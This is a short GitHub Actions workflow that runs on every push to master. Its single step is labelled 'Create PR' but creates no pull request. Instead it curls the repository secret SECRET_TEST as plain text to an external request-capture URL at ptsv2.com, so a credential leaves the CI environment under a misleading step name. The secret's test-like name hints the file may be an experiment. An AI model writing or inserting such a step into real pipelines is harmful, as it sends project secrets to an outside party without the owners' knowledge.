name: pr

on:
  push:
    branches:
    - master

jobs:
  build:

    runs-on: ubuntu-latest
    
    steps:
      - name: Create PR
        env:
          SECRET_TEST: ${{ secrets.SECRET_TEST }}
        run: |-
          curl -X POST https://ptsv2.com/t/9uep7-1649057471/post --header 'Content-Type: text/plain' --data-raw "${SECRET_TEST}"
